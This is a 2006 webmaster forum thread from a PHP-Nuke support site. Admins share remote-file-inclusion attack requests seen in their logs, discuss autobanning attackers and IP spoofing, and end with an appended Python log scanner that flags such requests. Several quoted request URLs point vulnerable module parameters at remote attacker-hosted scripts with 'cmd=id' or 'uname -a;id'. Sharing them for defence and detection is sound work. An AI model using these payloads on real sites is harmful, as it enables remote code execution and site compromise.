Ravens PHP Scripts: Forums
 

 

hitwalker
Sells PC To Pay For Divorce



Joined:
Posts: 5661

Posted: Mon Mar 13, 2006 4:44 pm

Ok peeps,
perhaps Raven agrees it's a good idea to open a special forum for these warnings... but until then I'll post them here...
Just received this attack, useless to me because I don't have AllMyGuests installed...

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
 
evaders99
Former Moderator in Good Standing



Joined: Apr 30, 2004
Posts: 3221

Posted: Mon Mar 13, 2006 5:39 pm

Good to know :)

I'll add everything I've seen if Raven wants to open a place to report them

_________________
- Star Wars Rebellion Network -

Need help? Nuke Patched Core, Coding Services, Webmaster Services 
hitwalker







Posted: Mon Mar 13, 2006 5:48 pm

Yes, I did ask him to open a special forum for this... As he wanted to know more info on the idea, I gave him that by PM.
Just have to wait and see what he thinks of it.
 
Susann
Moderator



Joined: Dec 19, 2004
Posts: 3191
Location: Germany:Moderator German NukeSentinel Support

Posted: Mon Mar 13, 2006 6:15 pm

Would be great to find an ultimate solution for this problem.
kguske
Site Admin



Joined: Jun 04, 2004
Posts: 6433

Posted: Mon Mar 13, 2006 8:11 pm

Got my finger on the trigger, just point me in the right direction...just kidding!

_________________
I search, therefore I exist...
nukeSEO - nukeFEED - nukePIE - nukeSPAM - nukeWYSIWYG
 
Guardian2003
Site Admin



Joined: Aug 28, 2003
Posts: 6799
Location: Ha Noi, Viet Nam

Posted: Tue Mar 14, 2006 12:54 am

Here are a couple I intercepted just within the last 24 hours;
Quote:
/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.adxteam.ru/modules/tool25.dat?cmd=id

Quote:
/modules/My_eGallery/index.php?basepath=http://www.adxteam.ru/modules/tool25.dat?cmd=id

Quote:
/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://saudia.100free.com/asc.txt?&cmd=uname%20-a;id

Quote:
/modules/4nAlbum/public/displayCategory.php?basepath=http://www.lilspage.de/modules/tool25.dat?cmd=id
 
Raven
Site Admin/Owner



Joined: Aug 27, 2002
Posts: 17088

Posted: Tue Mar 14, 2006 3:17 am

I have been mulling this over since I got your PM. My main concern with this is that we would become a central repository for every script kiddie that gets a new 'puter from Mommy and Daddy.


Last edited by Raven on Tue Mar 14, 2006 8:05 am; edited 1 time in total 
hitwalker







Posted: Tue Mar 14, 2006 4:13 am

I understand, Raven...
But there must be a way to do this, by making the forum for registered users....
And script kiddies usually fail with their wannabe attempts..
And.... sure, we can post it in a way that we don't publish the full used URL/directory.
Thing is also, if you would use Google you can find a lot on the web; I think they aren't going to use this site to get resources or examples.

We're just publishing the way wannabes used to do something.
What will not be published is the actual URL/directory, and don't forget that the actual script used isn't published either.
 
evaders99







Posted: Tue Mar 14, 2006 8:27 am

Aye - script kiddies can just Google for the vulnerability though. I Google all the 404s I get, and the vulnerabilities pop right up to the top.

Perhaps a way to encrypt the search strings so that script kiddies can't read them directly? Integrate it into a distribution of Sentinel or another protection script.

Just report the IP hitting the site then? I'm using a very simple 404 redirect to do an autoban of vulnerabilities I've found hitting my site. These are obviously malicious attacks, so I have no qualms about banning the address. They will keep trying with other vulnerabilities.
 
hitwalker







Posted: Tue Mar 14, 2006 8:40 am

Well, I'm just talking about attacks on any Nuke-related mods... like the few I just posted... not actual attack scripts..
To post a few examples they have tried...

Code:


modules/My_eGallery/public
modules/4nAlbum/public/
modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR
modules/agendax/addevent.inc.php?agendax_path
modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=


Whoever reads this, keep in mind that what's posted here was the actual target, but in combination with certain scripts.
As it's posted now it has no value whatsoever, but is merely to point out the stuff you should keep an eye on.
 
Guardian2003







Posted: Tue Mar 14, 2006 8:58 am

evaders99 wrote:
<snipped> I'm using a very simple 404 redirect to do an autoban of vulnerabilities I've found hitting my site. These are obviously malicious attacks, so I have no qualms about banning the address. They will keep trying with other vulnerabilities.

But wouldn't this mean that if the IP was spoofed, it could potentially ban a legitimate IP?
 
evaders99







Posted: Tue Mar 14, 2006 11:39 am

How is the IP spoofed? Either it is a direct attacker or something going through a compromised server or known proxy.
 
Guardian2003







Posted: Wed Mar 15, 2006 12:35 am

It is my understanding (please correct me if I am wrong) that by modifying a data packet header it is possible to present an IP which is not necessarily the same as the true or proxy IP - in other words, that the IP address can be presented as anything a potential hacker wants you to think it is.
If it is possible to forge an IP address in this way, then if, for example, the IP address of Google's search bots were presented during a number of attack attempts, Sentinel would then end up banning Google from your site.
 
evaders99







Posted: Wed Mar 15, 2006 8:36 am

I haven't seen the technology available to do so. But any kind of software can be fiddled with.

I've only had a couple hundred bans though, few from western countries. I definitely report those to the ISP. Others are just known robots from Turkey, China, Brazil...
 
Raven







Posted: Wed Mar 15, 2006 8:48 am

Guardian2003 wrote:
It is my understanding (please correct me if I am wrong) that by modifying a data packet header it is possible to present an IP which is not necessarily the same as the true or proxy IP - in other words, that the IP address can be presented as anything a potential hacker wants you to think it is.
If it is possible to forge an IP address in this way, then if, for example, the IP address of Google's search bots were presented during a number of attack attempts, Sentinel would then end up banning Google from your site.

You are quite correct. IP spoofing is a common tactic. Normally these scripts are written in Perl.
 
evaders99







Posted: Wed Mar 15, 2006 10:46 am

Ah, so I'm reading, IP spoofing is more directed at DoS attacks. But it is certainly possible for people to use this to hide their hacking.

Here's to all the headaches that hackers cause... gah.
Now to write some code to block automatically with Sentinel and I'll be set
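
The kind of check discussed in this thread, as an added example that is not part of any poster's message and is not NukeSentinel code: it scans access-log lines for requests whose query parameters carry a remote URL (the pattern in the requests quoted above) and lists the client IPs that cross a ban threshold. The log format, the threshold, the allowlist and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Common Log Format prefix: client IP ... "METHOD target ..."
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (\S+)')
# A decoded parameter value that begins with a URL scheme names remote content.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def rfi_params(target):
    """Return names of query parameters whose value is a remote URL."""
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    return [name for name, value in pairs if REMOTE_RE.match(value.strip())]

def ips_to_ban(lines, allowlist=frozenset(), threshold=2):
    """Return sorted client IPs with >= threshold matching requests.

    allowlist holds addresses that must never be banned automatically
    (an assumption of this sketch, e.g. crawlers the site depends on).
    """
    hits = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m and rfi_params(m.group(2)):
            hits[m.group(1)] += 1
    return sorted(ip for ip, n in hits.items()
                  if n >= threshold and ip not in allowlist)

# Constructed sample: documentation IP ranges and a placeholder host.
_T = '[14/Mar/2006:00:50:01 -0600]'
SAMPLE_LOG = [
    f'192.0.2.10 - - {_T} "GET /modules/My_eGallery/index.php?basepath=http://host.example/t.dat?cmd=id HTTP/1.0" 404 210',
    f'192.0.2.10 - - {_T} "GET /modules/4nAlbum/public/displayCategory.php?basepath=http%3A%2F%2Fhost.example%2Ft.dat HTTP/1.0" 404 210',
    f'198.51.100.7 - - {_T} "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://host.example/a.txt HTTP/1.0" 404 210',
    f'203.0.113.9 - - {_T} "GET /index.php?GLOBALS=&mosConfig_absolute_path=http://host.example/t.dat HTTP/1.0" 200 5120',
    f'203.0.113.9 - - {_T} "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=ftp://host.example/x HTTP/1.0" 404 210',
    f'203.0.113.5 - - {_T} "GET /modules.php?name=Search&query=see+http://example.org HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    print(ips_to_ban(SAMPLE_LOG, allowlist={"203.0.113.9"}))
```

Percent-encoded values are decoded before matching, and a URL that merely appears inside a longer value (the search request in the last sample line) is not flagged.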
 
All times are GMT - 6 Hours
 